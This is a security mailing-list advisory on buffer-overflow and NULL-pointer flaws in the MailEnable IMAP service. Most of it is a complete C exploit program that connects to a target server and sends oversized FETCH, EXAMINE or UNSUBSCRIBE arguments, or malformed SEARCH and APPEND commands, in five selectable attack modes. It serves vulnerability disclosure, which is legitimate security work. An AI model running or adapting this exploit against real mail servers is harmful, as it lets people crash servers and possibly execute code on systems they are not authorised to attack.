[zz]:[NT] MailEnable Professional/Enterprise Multiple Vulnerabilities

主题: [NT] MailEnable Professional/Enterprise Multiple Vulnerabilities

 

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html


- - - - - - - - -

MailEnable Professional/Enterprise Multiple Vulnerabilities

MailEnable is "a mail server for Windows which supports various protocols like SMTP, POP3, IMAP, webmail and a HTTPMail service". Multiple vulnerabilities have been discovered in the MailEnable product these vulnerabilities allow attacker to trigger buffer overflows as well as NULL pointer references.

Multiple post-auth buffer-overflows
The IMAP service (MEIMAPS.exe) of MailEnable is affected by some buffer-overflow vulnerabilities caused by too long parameters passed to the FETCH, EXAMINE and UNSUBSCRIBE commands allowing an attacker to execute malicious code.

All the vulnerable commands require an account to be exploited.

NULL pointers
The IMAP service is affected also by two NULL pointer vulnerabilities exploitable through the omission of the required arguments for the SEARCH and APPEND commands, where the first can be used by unauthenticated attackers too.

Exploit:
/*

by Luigi Auriemma - http://aluigi.org/poc/maildisable.zip

*/

#include
#include
#include
#include
#include
#include

#ifdef WIN32
#include
#include "winerr.h"

#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include
#include
#include
#include
#include
#include

#define ONESEC 1
#endif

typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;



#define VER "0.1"
#define PORT 143
#define BUFFSZ 2050
#define BOF "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"



int fgetz(u8 *data, int size, FILE *fd);
int imap_send(int sd, u8 *cmd, ...);
int imap_recv(int sd, u8 *buff, int maxsz);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int tag;



int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
step = 1,
attack;
u16 port = PORT;
u8 buff[BUFFSZ],
folder[128],
user[128],
pass[128];

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

setbuf(stdout, NULL);

fputs("\n"
"MailEnable Professional/Enterprise <= 3.1.3 IMAP multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: aluigi.org\n"
"\n", stdout);

if(argc < 3) {
printf("\n"
"Usage: %s [port(%hu)]\n"
"\n"
"Attacks:\n"
" 1 = post-auth buffer-overflow in FETCH\n"
" 2 = post-auth buffer-overflow in EXAMINE\n"
" 3 = post-auth buffer-overflow in UNSUBSCRIBE\n"
" 4 = pre-auth NULL pointer in SEARCH\n"
" 5 = post-auth NULL pointer in APPEND\n"
"\n", argv[0], port);
exit(1);
}

attack = atoi(argv[1]);
if((attack < 1) || (attack > 5)) {
printf("\nError: wrong attack number (%s)\n", argv[1]);
exit(1);
}

if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

strcpy(folder, "Inbox");
user[0] = 0;
if(attack != 4) {
printf("- insert the IMAP username: ");
fgetz(user, sizeof(user), stdin);
printf("- insert password: ");
fgetz(pass, sizeof(pass), stdin);
}

redo:
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
tag = 1;

if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;

if(user[0]) {
imap_send(sd, "LOGIN", user, pass, NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;
if(!strstr(buff, " OK LOGIN")) goto quit;
}

if(attack == 1) {
if(step == 1) {
printf("- at least one message in the folder is required, so I add it\n");
imap_send(sd, "APPEND", folder, "{0}", NULL); // needed in case doesn't contain stuff!
if(imap_recv(sd, buff, BUFFSZ) < 0) {
printf("\nError: seems to exist problems with the folder %s\n", folder);
printf("- type the name of another folder which contains mails: ");
fgetz(folder, sizeof(folder), stdin);
} else {
send(sd, "\r\n", 2, 0);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;
imap_send(sd, "LOGOUT", NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;
}
close(sd);
step++;
goto redo;
}
imap_send(sd, "SELECT", folder, NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;
if(strstr(buff, " BAD ") || strstr(buff, " failed ")) {
close(sd);
printf("\nError: seems to exist problems with the folder %s\n", folder);
printf("- type the name of another folder which contains mails: ");
fgetz(folder, sizeof(folder), stdin);
goto redo;
}
imap_send(sd, "LIST", "\"\"", "\"\"", NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;
imap_send(sd, "FETCH", "1:4", BOF, NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;

} else if(attack == 2) {
imap_send(sd, "EXAMINE", BOF, NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;

} else if(attack == 3) {
imap_send(sd, "UNSUBSCRIBE", BOF, NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;

} else if(attack == 4) {
imap_send(sd, "SEARCH", NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;

} else if(attack == 5) {
imap_send(sd, "APPEND", NULL);
if(imap_recv(sd, buff, BUFFSZ) < 0) goto quit;
}

quit:
close(sd);
printf("- done\n");
return(0);
}



int fgetz(u8 *data, int size, FILE *fd) {
u8 *p;

fgets(data, size, fd);
for(p = data; *p && (*p != '\n') && (*p != '\r'); p++);
*p = 0;
return(p - data);
}



int imap_send(int sd, u8 *cmd, ...) {
va_list ap;
u8 buff[BUFFSZ],
*arg,
*p;

p = buff;
p += sprintf(buff, "A%03d %s", tag++, cmd);
va_start(ap, cmd);
while((arg = va_arg(ap, u8 *))) {
p += sprintf(p, " %s", arg);
}
va_end(ap);
printf(" %s\n", buff);
p += sprintf(p, "\r\n");

send(sd, buff, p - buff, 0);
return(0);
}



int imap_recv(int sd, u8 *buff, int maxsz) {
int len;
u8 tmp[maxsz];

maxsz--;
do {
for(len = 0; len < maxsz; len++) {
if(timeout(sd, 5) < 0) return(-1);
if(recv(sd, tmp + len, 1, 0) <= 0) return(-1);
if(tmp[len] == '\r') tmp[len] = 0;
if(tmp[len] == '\n') break;
}
tmp[len] = 0;
printf(" %s\n", tmp);
if(tag == 1) break;
} while(tmp[0] == '*');
strcpy(buff, tmp);
return(len);
}



int timeout(int sock, int secs) {
struct timeval tout;
fd_set fdr;
int err;

tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fdr);
FD_SET(sock, &fdr);
err = select(sock + 1, &fdr, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}



u32 resolv(char *host) {
struct hostent *hp;
u32 host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u32 *)hp->h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

Additional Information:
The information has been provided by Luigi Auriemma.
The original article can be found at: http://aluigi.altervista.org/adv/maildisable-adv.txt

================================================================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: html-list-unsubscribe@securiteam.com
In order to subscribe to the mailing list and receive advisories in HTML format, simply forward this email to: html-list-subscribe@securiteam.com

================================================================================
================================================================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.